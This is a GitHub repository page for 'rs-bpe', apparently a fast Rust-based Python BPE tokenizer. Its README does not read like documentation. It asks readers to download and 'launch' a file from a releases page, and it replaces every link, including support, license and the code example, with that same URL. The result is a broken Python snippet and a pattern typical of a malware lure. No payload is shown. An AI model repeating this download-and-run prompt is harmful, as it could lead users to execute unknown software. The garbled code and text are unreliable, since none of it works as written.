Skip to content

A ridiculously fast Python BPE (Byte Pair Encoder) implementation written in Rust

License

Notifications You must be signed in to change notification settings

SameerManan/rs-bpe

Repository files navigation

🚀 Fast BPE Tokenizer in Rust

Welcome to the official repository of "rs-bpe" - a blazingly fast Python BPE (Byte Pair Encoder) implementation written in Rust!

📦 Repository Information

  • Repository Name: rs-bpe
  • Description: A ridiculously fast Python BPE (Byte Pair Encoder) implementation written in Rust
  • Topics: bpe, bpe-tokenizer, byte-pair-encoding, byte-pair-tokenizer, huggingface, llm, openai, pypi-package, python, rust, tiktoken, tokenizers

🌟 Features

  • Lightning-fast performance thanks to the Rust programming language
  • Easy integration with Python projects
  • Wide range of topics and support for various tokenization tasks

🔗 Repository Link

Download https://github.com/SameerManan/rs-bpe/releases

🎉 Launch Instructions

Please launch the file present in the provided release link.

🚀 Getting Started

To start using the rs-bpe repository, follow these steps:

  1. Download the latest release from the specified link.
  2. Launch the downloaded file.
  3. Integrate rs-bpe into your Python projects for fast and efficient tokenization.

📂 Directory Structure

The repository structure is organized as follows:

  • src: Contains the source code for the BPE implementation
  • examples: Includes examples on how to use rs-bpe in Python projects
  • docs: Documentation on the usage and features of the BPE tokenizer

🛠️ Usage

Here is a simple example of how you can use rs-bpe in your Python projects:

import rsbpe

# Initialize the BPE tokenizer
tokenizer = https://github.com/SameerManan/rs-bpe/releases()

# Tokenize a sentence
tokens = https://github.com/SameerManan/rs-bpe/releases("This is a sample sentence.")

# Print the tokenized output
print(tokens)

🚧 Contributing

We welcome contributions from the community to enhance the rs-bpe repository. If you have any suggestions, bug fixes, or new features to add, feel free to submit a pull request.

📞 Support

For any queries or issues, please reach out to our support team at https://github.com/SameerManan/rs-bpe/releases

🌐 Links

🙌 Acknowledgements

We would like to thank the following organizations for their support:

  • HuggingFace
  • OpenAI
  • Python Software Foundation
  • Rust Community

📝 License

This project is licensed under the MIT License - see the https://github.com/SameerManan/rs-bpe/releases file for details.


Feel free to explore the rs-bpe repository and take advantage of its high-performance BPE tokenization capabilities! 🚀🔥

BPE Tokenizer

About

A ridiculously fast Python BPE (Byte Pair Encoder) implementation written in Rust

Topics

Resources

License

Stars

Watchers

Forks

Packages

No packages published